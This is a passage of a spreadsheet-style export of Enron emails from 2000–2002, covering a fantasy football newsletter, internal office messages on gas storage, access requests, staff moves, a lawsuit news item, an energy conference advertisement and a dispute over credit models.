the =01&amp;start=018 but expect to see plenty of Tony Richardson and  Frank Mo=_x000D_
reau.?=20_x000D_
Richardson in  particular does a nice job receiving the ball.?_x000D_
_x000D_
Dallas=01,  Emmitt Smith vs Raven Defense?? Let=01,s put it this way:? Smit=_x000D_
h was=20_x000D_
shut down by Cincinnati last  week.? And the Ravens are a just a  tad bit=_x000D_
=20_x000D_
better than the Bengals when it comes to run defense.? If anyone can bounce=_x000D_
=20_x000D_
back, it=01,s Smith  but last Sunday was very worrisome.?  The Ravens are f=_x000D_
lying=20_x000D_
high after a huge road win at Tennessee.? He=01,s still a solid RB but Smit=_x000D_
h=20_x000D_
will  have his hands more than full Sunday.?  The Ravens rank # 3 in rushin=_x000D_
g=20_x000D_
yards allowed per  game over the last four weeks and for the year they rate=_x000D_
 #=20_x000D_
2  in Fantasy Points  allowed to the opposing RB.?_x000D_
_x000D_
New York  Jets=01, Curtis Martin vs Dolphin Defense? I don=01,t  see a repe=_x000D_
at of=20_x000D_
the week 8 meltdown from Miami on defense.? Martin will have a tough day=20_x000D_
ahead of  him against the Dolphin defense that ranks # 10 over the last fou=_x000D_
r=20_x000D_
weeks  in rushing yards allowed  per game.? Over the  season, they rank # 8=_x000D_
=20_x000D_
in  Fantasy Points allowed to the opposing RB.? The Dolphins were hopeful L=_x000D_
B=20_x000D_
Zach Thomas  could return but that=01,s not looking too likely now.? It=01,=_x000D_
ll be=20_x000D_
even tougher for Martin if he  does.?_x000D_
_x000D_
New Orleans  Jerald Moore / Chad Morton vs Raider Defense??  New Orleans=20_x000D_
catches a tough break as the new RBs are forced to make their  first start=_x000D_
=20_x000D_
facing the # 1 rush defense in rushing yards allowed per  game over the las=_x000D_
t=20_x000D_
four weeks.? For the year, they=01,re not quite as tough  ranking # 12 in=_x000D_
=20_x000D_
Fantasy  Points allowed to the opposing RB.? It=01,s tough to call right no=_x000D_
w how=20_x000D_
the  carries will be distributed as the Saints are understandably being=20_x000D_
tight  lipped.? I expect Moore to carry  most of the load to begin with.? =_x000D_
=20_x000D_
He=01,s the more physical back and much more like Williams than is Morton  =_x000D_
who=20_x000D_
falls closer to the scat back / 3rd down guy mold.? I can envision somethin=_x000D_
g=20_x000D_
similar to the  rotation New England is using with J.R. Redmond and Kevin=_x000D_
=20_x000D_
Faulk.? For FF purposes, you=01,d of course like to  see one guy take over =_x000D_
but I=20_x000D_
don=01,t see that now.? The other wild card is newly signed  Terry Allen wh=_x000D_
o=20_x000D_
sounds excited about football again.? We=01,ll see how quickly he can get =_x000D_
=20_x000D_
comfortable.? =20_x000D_
_x000D_
?_x000D_
_x000D_
?_x000D_
_x000D_
?_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
 To unsubscribe from this group, send an email to:_x000D_
cheatsheets-unsubscribe@egroups.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 8 Feb 2001 03:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Did you know</t>
  </si>
  <si>
    <t xml:space="preserve">Scooped me on Ray.  I like him._x000D_
_x000D_
I heard Debbie Chance is transferring to another group, and that Reagan is _x000D_
going to be an originator (not a developer)._x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Kathleen Carnahan                           02/08/2001 11:20 AM_x000D_
	_x000D_
_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Did you know_x000D_
_x000D_
that Ray Hoppe is leaving (if not already gone)?  Think he is going to Duke._x000D_
_x000D_
K-_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 9 Aug 2001 10:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'p..messenger@enron.com'})</t>
  </si>
  <si>
    <t>RE: gas info</t>
  </si>
  <si>
    <t>As a policy we only provide this info to customers who do business with us.  _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Messenger, John P.  _x000D_
Sent:	Monday, August 06, 2001 10:56 PM_x000D_
To:	Zufferli, John_x000D_
Subject:	gas info_x000D_
_x000D_
John,_x000D_
_x000D_
My neighbour is an equity trader with Peters &amp; Co. and is looking to get a morning commentary on the naural gas market. Do we have anybody in the office who provides this sort of information ? Let me know._x000D_
_x000D_
Thanks,_x000D_
_x000D_
John</t>
  </si>
  <si>
    <t>Thu, 12 Oct 2000 10:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'fabian.flip@lgeenergy.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Flip:_x000D_
_x000D_
This e-mail will confirm the site visit by your company at Gleason and _x000D_
Wheatland.  The relevant information is as follows:_x000D_
_x000D_
_x000D_
Pursuant to the Site Visit Procedures sent you by CSFB, if you have not _x000D_
already done so, please send me the following:_x000D_
List of your team members and titles_x000D_
For outside consultants, state their employer_x000D_
Name, phone number (office and mobile) and e-mail address of your designated _x000D_
deal team leader_x000D_
_x000D_
Lastly, I will serve as the due diligence coordinator for Gleason and _x000D_
Wheatland, handling all questions and responses.  Should you have any due _x000D_
diligence questions or require copies of any oversized documents, please _x000D_
contact me at 713.853.7998._x000D_
_x000D_
Regards,_x000D_
Ben  </t>
  </si>
  <si>
    <t>Mon, 14 May 2001 14:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'darron.c.giron@enron.com'})</t>
  </si>
  <si>
    <t>Request Submitted: Access Request for jason.r.williams@enron.com</t>
  </si>
  <si>
    <t xml:space="preserve">You have received this email because you are listed as a data approver. _x000D_
Please click _x000D_
http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000034744&amp;Page=_x000D_
Approval to review and act upon this request._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Request ID          : 000000000034744_x000D_
Request Create Date : 5/14/01 4:59:17 PM_x000D_
Requested For       : jason.r.williams@enron.com_x000D_
Resource Name       : Sitara Houston Production West View Only Settlements_x000D_
Resource Type       : Applications_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 30 Jan 2002 09:48:02 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'freimer.1@osu.edu'})</t>
  </si>
  <si>
    <t>miriam freimer_x000D_
639 crossing creek south_x000D_
gahanna, OH 43230_x000D_
freimer.1@osu.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miriam freimer</t>
  </si>
  <si>
    <t>Tue, 22 May 2001 11:57:01 -0700 (PDT)</t>
  </si>
  <si>
    <t>Technical Support</t>
  </si>
  <si>
    <t>Outside the U.S.,  please call one of the Tech Support Phone numbers listed on the Worldwide Customer Support Information card. _x000D_
_x000D_
For other technical support information, please visit the web site www.palm.com.</t>
  </si>
  <si>
    <t>Fri, 29 Dec 2000 01:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>PrePay Book Request</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Errol McLaughlin/Corp/Enron on 12/29/2000 _x000D_
09:00 AM ---------------------------_x000D_
_x000D_
_x000D_
Errol McLaughlin_x000D_
12/29/2000 08:58 AM_x000D_
To: Chris Abel/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: PrePay Book Request_x000D_
_x000D_
Attached is the book request for the Chase-Stoneville-Mahonia prepay.  I have _x000D_
to have this by 10 am._x000D_
_x000D_
Thanks, _x000D_
_x000D_
Errol_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 13 Sep 2000 04:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'donna.greif@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'katherine.kelly@enron.com', 'robert.superty@enron.com', 'joann.collins@enron.com', 'sherry.anastas@enron.com', 'jim.pond@enron.com', 'john.valdes@enron.com', 'mark.mcclure@enron.com', 'victor.lamadrid@enron.com', 'bryce.baxter@enron.com', 'chris.germany@enron.com', 'angel.fuller@enron.com'})</t>
  </si>
  <si>
    <t>Columbia Gas - Pathing Arrangements &amp; Storage Valuation</t>
  </si>
  <si>
    <t xml:space="preserve">Yesterday, Logistics, Volume Management and the CGAS Trader met to discuss _x000D_
pathing arrangements for the CES Storage deal._x000D_
_x000D_
 C R I T I C AL   I N F O R M A T I O N   F O R   V O L U M E   M A N A G E M _x000D_
E N T_x000D_
  * All Storage Account Balances for contracts 67713, 51407 and 39607 should _x000D_
not be valued as an ENA asset_x000D_
   - The storage inventory is CES's inventory and NOT owned by ENA._x000D_
   - The storage inventory on contracts 67713, 51407 and 39607 should NOT be _x000D_
part of the UA4 calculation_x000D_
   - Fuel associated with storage injection should be part of _x000D_
  * The "Select Point" feature will be used to create the sale to CES in _x000D_
storage.  This pathing process will allow deal_x000D_
     to be settled. _x000D_
   -The "Point" balances should NOT be part of the UA4 calculation_x000D_
   _x000D_
_x000D_
Logistics is in the process of correcting pathing arrangements for the _x000D_
injection season to match the schematic as provided below.  Once this is _x000D_
completed, Volume Management can complete the actualization process._x000D_
_x000D_
Logistics did make part of the corrections needed for the withdrawal season, _x000D_
to allow actualization on the storage contract; yet did not redo the _x000D_
transportation piece.   Due to this, the pipeline is not in balance.  _x000D_
_x000D_
Logistics would like to meet with Volume Management and discuss this clean up _x000D_
process.  I will try to set up a meeting for next week (Anastas, Kelly, _x000D_
Lamadrid, Collins, Fuller, Superty &amp; me).   How does Wednesday afternoon _x000D_
(9/20/00 at 2 p.m.) look for you guys?  _x000D_
_x000D_
Please get with me if you have any questions.  If you could also please _x000D_
forward to anyone I may have excluded from this email._x000D_
_x000D_
Thanks,_x000D_
_x000D_
dg_x000D_
_x000D_
Pathing arrangements for CES Storage deals should be created following the _x000D_
schematics below._x000D_
</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 08:59:31 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">i hope that you are right._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Monday, November 19, 2001 10:59 AM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
youre not going anywhere_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Monday, November 19, 2001 10:58 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
um ok._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Monday, November 19, 2001 10:57 AM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
nope, and stop_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Monday, November 19, 2001 10:54 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
_x000D_
_x000D_
isn't that being too nice?  so i am freaking out about my job again. </t>
  </si>
  <si>
    <t>Wed, 23 May 2001 03:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Cancellation Notice: Staff Meeting &amp; Conference Call/Next Week's_x000D_
 Reminder</t>
  </si>
  <si>
    <t>Please be advised that, per Paul, this week's Staff meeting &amp; _x000D_
conference call has been cancelled; however, he indicated that next week _x000D_
(post Memorial Day weekend), we should definitely have one.  (Stay tuned for _x000D_
further updates.)_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Joseph</t>
  </si>
  <si>
    <t>Mon, 5 Feb 2001 10:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: ME and LNG 2001 Objectives</t>
  </si>
  <si>
    <t>thanks for the quick and thorough response._x000D_
m</t>
  </si>
  <si>
    <t>Tue, 29 Jan 2002 12:48:11 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'robert.superty@enron.com', 'mike.grigsby@enron.com', 's..shively@enron.com', 'scott.neal@enron.com', 'd..steffes@enron.com'})</t>
  </si>
  <si>
    <t>Canceled: UBS Pipeline Set-up</t>
  </si>
  <si>
    <t>When: Tuesday, January 29, 2002 3:00 PM-4:00 PM (GMT-06:00) Central Time (US &amp; Canada)._x000D_
Where: 5102_x000D_
_x000D_
*~*~*~*~*~*~*~*~*~*_x000D_
_x000D_
Meet to discuss plan for pipeline start-up.</t>
  </si>
  <si>
    <t>Fri, 25 May 2001 03:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: AES Eastern Energy</t>
  </si>
  <si>
    <t xml:space="preserve">wonderful --- thanks_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Jones, Tana  _x000D_
Sent: Friday, May 25, 2001 8:42 AM_x000D_
To: Gray, Mary Griff_x000D_
Subject: Re: AES Eastern Energy _x000D_
_x000D_
I need to approve, I'll approve today._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Mary Griff Gray/ENRON@enronXgate 05/25/2001 07:08 AM 	   To: Tana _x000D_
Jones/HOU/ECT@ECT  cc:   Subject: AES Eastern Energy _x000D_
_x000D_
_x000D_
Miss Tana ---_x000D_
Is this app almost through Legal?  The customer is anxious to get on board _x000D_
--- this has been an extremely difficult process so far._x000D_
Thanks, Tana, and have a wonderful holiday weekend._x000D_
Griff_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Gray, Mary Griff  _x000D_
Sent: Wednesday, May 23, 2001 6:32 AM_x000D_
To: Sever, Stephanie; Jones, Tana_x000D_
Subject: AES Eastern Energy _x000D_
_x000D_
Ladies,_x000D_
_x000D_
What's the status on this registration?  The customer is eager to receive _x000D_
transaction status (calls fairly often so I would call that "eager")._x000D_
_x000D_
Thanks,_x000D_
Griff_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 27 Dec 1999 08:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: East Power Review resutls</t>
  </si>
  <si>
    <t xml:space="preserve">I am not especially surprised that you and Kristin did not get a copy of this _x000D_
report.  My "assumption" in my message was wishful thinking and not _x000D_
conviction that the sign-off meeting between you and AA had occurred.  _x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Leslie Reeves                           12/27/99 02:35 PM_x000D_
	_x000D_
_x000D_
To: Sally Beck/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: East Power Review resutls_x000D_
_x000D_
Sally,_x000D_
_x000D_
Thank you for the copy.  Contrary to your assumption, this is the first _x000D_
Kristin or I have seen the draft.  I'm sure Kristin will discuss it with you _x000D_
and her displeasure with AA.  _x000D_
_x000D_
Thanks,_x000D_
Leslie_x000D_
---------------------- Forwarded by Leslie Reeves/HOU/ECT on 12/27/99 02:33 _x000D_
PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Sally Beck                           12/27/99 11:29 AM_x000D_
	_x000D_
_x000D_
To: Kristin Albrecht/HOU/ECT@ECT, Leslie Reeves/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: East Power Review resutls_x000D_
_x000D_
I hope that the two of you received a copy of this. Although Jennifer;s _x000D_
message doesn't mention it, I assume also that she reviewed the findings with _x000D_
you.  _x000D_
---------------------- Forwarded by Sally Beck/HOU/ECT on 12/27/99 11:28 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Jennifer Stevenson@ENRON_x000D_
12/20/99 09:31 AM_x000D_
To: Sally Beck/HOU/ECT@ECT, Wanda Curry/HOU/ECT@ECT, Ted Murphy/HOU/ECT@ECT_x000D_
cc: James J Brown/AA/Corp/Enron@Enron, Thomas Bauer/AA/Corp/Enron@Enron, John _x000D_
Sorrells/AA/Corp/Enron@Enron _x000D_
Subject: East Power Review resutls_x000D_
_x000D_
Attached are the results of our East Power review.  Although some of the _x000D_
identified areas for improvement are outside the responsibility of East _x000D_
Power, we wanted to bring these items to the attention of management for _x000D_
their consideration.  _x000D_
_x000D_
There is no planned Monthly Audit Meeting to discuss this report as we have _x000D_
done in the past; therefore, if you have any questions or comments and would _x000D_
like to set up a meeting with either of us, please feel free to contact us. _x000D_
_x000D_
Thank you_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 29 Nov 2000 01:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Ouch!   _x000D_
---------------------- Forwarded by Christian Yoder/HOU/ECT on 11/29/2000 _x000D_
09:26 AM ---------------------------_x000D_
_x000D_
_x000D_
Mary Hain_x000D_
11/29/2000 09:23 AM_x000D_
To: Christian Yoder/HOU/ECT@ECT, steve.c.hall@enron.com_x000D_
cc:  _x000D_
Subject: Lawsuit Filed In San Diego Vs Enron For Power Mkt Abuses_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Mary Hain/HOU/ECT on 11/29/2000 09:31 AM _x000D_
---------------------------_x000D_
From: Jeff Dasovich@ENRON on 11/29/2000 11:06 AM CST_x000D_
Sent by: Jeff Dasovich@ENRON_x000D_
To: Sandra McCubbin/NA/Enron@Enron, Mona L Petrochko/NA/Enron@Enron, Susan J _x000D_
Mara/NA/Enron@ENRON, Mary Hain/HOU/ECT@ECT, Joe Hartsoe/Corp/Enron@ENRON, _x000D_
Sarah Novosel/Corp/Enron@ENRON, Alan Comnes/PDX/ECT@ECT, Roger _x000D_
Yang/SFO/EES@EES, Tim Belden/HOU/ECT@ECT, Robert Badeer/HOU/ECT@ECT, _x000D_
Christopher F Calger/PDX/ECT@ECT, David Parquet/SF/ECT@ECT, Dennis _x000D_
Benevides/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: Lawsuit Filed In San Diego Vs Enron For Power Mkt Abuses_x000D_
_x000D_
_x000D_
_x000D_
----- Forwarded by Jeff Dasovich/NA/Enron on 11/29/2000 11:03 AM -----_x000D_
_x000D_
	Ann M Schmidt_x000D_
	11/29/2000 10:59 AM_x000D_
		 _x000D_
		 To: Richard B Sanders/HOU/ECT@ECT, Richard Shapiro/NA/Enron@Enron, Jeff _x000D_
Dasovich/NA/Enron@Enron, Paul Kaufman/PDX/ECT@ECT, Cedric _x000D_
Burgher/Corp/Enron@ENRON, Mark Palmer/Corp/Enron@ENRON, Karen _x000D_
Denne/Corp/Enron@ENRON, Vance Meyer/NA/Enron@ENRON, Steven J _x000D_
Kean/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: Lawsuit Filed In San Diego Vs Enron For Power Mkt Abuses_x000D_
_x000D_
_x000D_
Lawsuit Filed In San Diego Vs Enron For Power Mkt Abuses_x000D_
_x000D_
11/29/2000_x000D_
Dow Jones Energy Service_x000D_
(Copyright (c) 2000, Dow Jones &amp; Company, Inc.)_x000D_
_x000D_
LOS ANGELES -(Dow Jones)- A second lawsuit is being filed in San Diego _x000D_
Superior Court Wednesday against Enron alleging the company, and others, _x000D_
overcharged California consumers more than $4 billion for electricity _x000D_
service. _x000D_
On Monday, a similar suit was filed against Dynegy Inc. (DYN), Reliant Energy _x000D_
Inc. (REI), Duke Energy North America (DUK), Southern Energy Company (SO), _x000D_
AES Corp., Williams Energy and NRG Energy. Both lawsuits are seeking class _x000D_
action status and may be consolidated into one complaint. _x000D_
The complaints allege unfair trade practices and illegal trust activity. A _x000D_
news conference announcing the details of the lawsuit will be held Wednesday _x000D_
morning in San Diego._x000D_
Enron does not own or operate major generating units in the state, but is _x000D_
active in trading electricity here and securing long-term fixed rate _x000D_
contracts for large industrial customers. At times, Enron sells power back _x000D_
into the California Power Exchange, the market where power is bought and sold _x000D_
in the state. _x000D_
An Enron representative said he has not yet seen the lawsuit and was unable _x000D_
to comment. _x000D_
The lawsuits claim Enron and the other energy companies withheld power supply _x000D_
last summer, created shortages by selling power out of state and used _x000D_
real-time confidential data about power plant activity to drive up prices. _x000D_
The lawsuits are an attempt to force generators to refund about $4 billion _x000D_
for electricity, the amount consumers were allegedly overcharged. -By Jason _x000D_
Leopold; Dow Jones Newswires; 323-658-3874;_x000D_
jason.leopold@dowjones.com_x000D_
_x000D_
_x000D_
Copyright , 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 10:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'shirley.mcdowell@enron.com'})</t>
  </si>
  <si>
    <t>RE: TRV User Information Needed</t>
  </si>
  <si>
    <t>I just got Robin Zivic's info.  rzivic is her log on._x000D_
PL</t>
  </si>
  <si>
    <t>Tue, 31 Oct 2000 02:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'alvin.thompson@enron.com', 'dave.scott@enron.com', 'joann.collins@enron.com', 'jeffrey.porter@enron.com'})</t>
  </si>
  <si>
    <t>Re: Supply Bought by NPC</t>
  </si>
  <si>
    <t xml:space="preserve">I created deal 461123 (purchase from New Power) and deal 461134 (sale to New _x000D_
Power).  I will price both deals using the FOM index pricing._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
10/31/2000 09:51 AM_x000D_
Jeffrey Porter@EES_x000D_
Jeffrey Porter@EES_x000D_
Jeffrey Porter@EES_x000D_
10/31/2000 09:51 AM_x000D_
10/31/2000 09:51 AM_x000D_
To: joann.collins@enron.com_x000D_
cc: Michael H Garred/HOU/EES, Chris Germany/HOU/ECT@ECT, Dave Scott/HOU/EES _x000D_
Subject: Supply Bought by NPC_x000D_
_x000D_
We bought this and need you to move to COH8-35 as part of CES/NPC Nov demand._x000D_
_x000D_
250/d(245/d delivered to COH) from Agg point  A06_x000D_
_x000D_
Contract:  AS53858 _x000D_
_x000D_
Supplier:  Dominion Field Services is the supplier_x000D_
_x000D_
call if you have questions 5-3507_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 21 Jan 2002 09:44:42 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'events@eyeforenergy.com'})</t>
  </si>
  <si>
    <t>Energy, Weather and Emissions Trading in Europe</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
=09=09 [IMAGE]  Three  trading conferences under one roof... at the Hotel O=_x000D_
kura, Amsterdam, 19-21 February 2001 =09_x000D_
 [IMAGE]    Over 70% of European companies face weather-related risk  Today=_x000D_
's business has become all about risk and how  to mitigate it. Weather deri=_x000D_
vatives have become one of the key tools  industries as wide ranging as uti=_x000D_
lities, airlines, agriculture have  at hand to offset risks associated with=_x000D_
 temperature and precipitation.  So how do you take advantage of this new m=_x000D_
arket  in weather trading that has emerged in Europe? What key issues do  y=_x000D_
ou have to be aware of to mitigate your operational and trading  risks thro=_x000D_
ugh weather? Amsterdam will be the place for traders,  marketers, exchanges=_x000D_
, brokers, and executives powering the weather  trading industry to network=_x000D_
 with each other.     Speakers at this event will include:  Aquila, Systeia=_x000D_
 Capital Management, Mirant,  LIFFE, Element Re, Entergy-Koch Trading, Risk=_x000D_
 Management  Solutions, Centrica, Utilicorp, weatherXchange,  Aon Capital M=_x000D_
arkets and many  more ...  Click a link to find out more: [IMAGE]  [IMAGE] =_x000D_
 [IMAGE]  [IMAGE]      =09 [IMAGE]    UBS Warburg estimates that  profits f=_x000D_
rom European power trading alone will top $2.4 billion in 2002  Add natural=_x000D_
 gas and oil and you're looking at a  huge pot of pure profit, only availab=_x000D_
le to those companies that  know how to best take advantage of the rise of =_x000D_
deregulation and  online trading in the European market.   Now in its 3rd y=_x000D_
ear, this is THE conference where  the European Energy Industry talks about=_x000D_
 the business of energy  trading. Case studies from traders, brokers, onlin=_x000D_
e exchanges and  energy companies to help you stay at the forefront of the =_x000D_
exploding  energy trading market.     Speakers at this event will include: =_x000D_
 Dynegy, Altra Energy, OM Group, Powergen, Bergen-Energi,  Amsterdam Power =_x000D_
Exchange, RWE Trading, ENDESA, The Utilities  Exchange, El Paso, Schlumberg=_x000D_
erSema, TXU and many  more ...  Click a link to find out more: [IMAGE]  [IM=_x000D_
AGE]  [IMAGE]  [IMAGE]      =09 [IMAGE]    "Carbon  credits represent a sig=_x000D_
nificant asset that companies ignore at their  peril" Jonathan Johns, Ernst=_x000D_
 &amp; Young  Emission trading options are ripe  for the picking - but how can =_x000D_
you make sure you're ready to profit  from GHG? Let's face it - you really =_x000D_
can't afford not to be, especially  as the World Bank has estimated demand =_x000D_
in the international GHG  trading system to be in the order of US$20 billio=_x000D_
n per annum  by 2010.  Eyeforenergy is delighted to bring  you this event w=_x000D_
hich will focus on how you can best seize this exciting  new market opportu=_x000D_
nity.     Speakers at this event will include:  BP, European Commission, Sh=_x000D_
ell, Amerada Hess, Powergen,  RMS, Fortum, Natsource, RMC Group, EcoSecurit=_x000D_
ies,  Rolls Royce, KfW, Point Carbon, IETA, TransAlta,  UK Dept of Environm=_x000D_
ent, and many  more ...  Click a link to find out more: [IMAGE]  [IMAGE]  [=_x000D_
IMAGE]  [IMAGE]      =09_x000D_
=09=09  "Congratulations on a successful conference! I found it extremely  =_x000D_
worthwhile. The structure and content were well-balanced, the organisation =_x000D_
 tight, the venue first-class and the discussion, both in and out of the  c=_x000D_
onference hall, interesting and valuable." Ian French, Frost &amp; Sullivan, Eu=_x000D_
rope  All three events will take place at the Hotel Okura, Amsterdam on  th=_x000D_
e 19-21 February 2002 Click here to visit  the information website for all =_x000D_
three events     =09_x000D_
=09=09  Sponsors: [IMAGE]  [IMAGE]      Media Sponsors:   [IMAGE]  [IMAGE] =_x000D_
 [IMAGE]  [IMAGE]  [IMAGE]  [IMAGE]  [IMAGE]  [IMAGE]  [IMAGE]  [IMAGE]  [I=_x000D_
MAGE]  [IMAGE]     =09_x000D_
=09=09(c) Eyeforenergy 2002 All enquiries regarding this email should be se=_x000D_
nt to events@eyeforenergy.com =09_x000D_
</t>
  </si>
  <si>
    <t>Fri, 1 Dec 2000 00:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Trade count by Country,Commodity and Category for Nov 29th,_x000D_
 2000</t>
  </si>
  <si>
    <t xml:space="preserve">peter berzins._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Andy Zipper@ENRON_x000D_
12/01/2000 08:07 AM_x000D_
To: Jeffrey A Shankman/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Trade count by Country,Commodity and Category for Nov 29th, 2000 _x000D_
 _x000D_
_x000D_
Okay. Who is peter ? do you mean leonardo ? I don't have a peter. I will let _x000D_
whoever is doing the report to have a new products section._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 28 May 2001 14:55:34 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'salmon@enron.com'})</t>
  </si>
  <si>
    <t>RE: Scott's concerns about the Public Firm Models</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Iris,_x000D_
_x000D_
I also have copies of and have read the documents you mention; while they contain some good information, especially the movement model plan, the meeting summary is just that...a very general summary of a meeting with recommendations like "hire quants and make sure there is adequate communication among the different teams".  The meeting summary addresses testing only briefly in saying "be aware of the time dimension" which is obvious and has been addressed by adding more equity driven ratios as well as our plan to add a time dimension to capture ratings momentum following a downgrade.    _x000D_
_x000D_
Perhaps you didn't understand my specific request for any ideas you might have to assist in model testing and also for an update on the Duffie report.  We still have not seen any drafts of what you learned.  As I'm sure you recall, the teleconference with Vince, Vasant, and Amitava focused exclusively on private firm models, the scope of the project, and data acquisition considerations.  After the call, you suggested to Bryan, Eric, Mike and I that your report would include many of the issues in George's 2 documents (movement model and meeting summary).  My personal hope, echoed by Bryan at that time, was that your report might be more insightful since the movement model, as you surely learned in your visit, is in its infancy and only one portion of the modelling effort and the meeting summary covered the most basic issues with minimal detail.    _x000D_
_x000D_
I sincerely want to establish a solid relationship with Houston Research and hope we can move forward together in a coordinated, team-oriented approach.  I look forward to discussing it with you at our Tuesday teleconference._x000D_
_x000D_
Best regards,_x000D_
Scott_x000D_
_x000D_
FYI - George joined the company in Sep 2000 so could not have written the Movement Model proposal in April 2000._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
From:	Iris Mack/ENRON@enronXgate on 26/05/2001 15:37 CDT_x000D_
To:	Scott Salmon/EU/Enron@Enron_x000D_
cc:	Vince J Kaminski/ENRON@enronXgate, Amitava Dhar/ENRON@enronXgate, Vasant Shanbhogue/ENRON@enronXgate, Jeff Kinneman/ENRON@enronXgate, Bryan Seyfried/LON/ECT@ECT, Markus Fiala/LON/ECT@ECT, Tanya Tamarchenko/ENRON@enronXgate _x000D_
_x000D_
Subject:	RE: Scott's concerns about the Public Firm Models_x000D_
_x000D_
_x000D_
_x000D_
Hi Scott, 	_x000D_
 _x000D_
_x000D_
	How are you?  Thanks for your email._x000D_
_x000D_
	I can appreciate your concerns about the public firm models, but am at a loss for what more I can say that has not already been said. _x000D_
_x000D_
	Recall that during my recent trip to London, we had a conference call with Houston research, you, Bryan, Mike and Eric.  During this conference call Vince, Vasant, Amitava and I pointed out some of the "issues" with the public firm models and the data used to develop these models.  _x000D_
_x000D_
	In addition, after that conference call you, Bryan, Mike, Eric and I had further discussions as to how to sort out the public firm models.  During this discussion we all agreed that most of these issues had already been raised and addressed by George Albanis in the following documents:_x000D_
		1.  EnronCredit.com Project Proposal - Movement Model and Parallel Work - Phases IV,  by George Albanis, December 2000_x000D_
		2.  Meeting 25/01/2001 - Review, by George Albanis.  _x000D_
_x000D_
	I also forwarded copies of these documents to you and Ben via email on May 11th.  Just in case you can't find them, I will forward them again._x000D_
_x000D_
	Based on recent discussions with Jeff Kinneman, it is my understanding that he will be meeting with Vince and Bryan to figure out how to "repair" the public firm models.  Hence it may be more appropriate to direct any future concerns about the public firm models to their attention._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Regards,_x000D_
Iris_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	_x000D_
 -----Original Message-----_x000D_
From: 	Salmon, Scott  _x000D_
Sent:	Friday, May 25, 2001 11:45 AM_x000D_
To:	Mack, Iris_x000D_
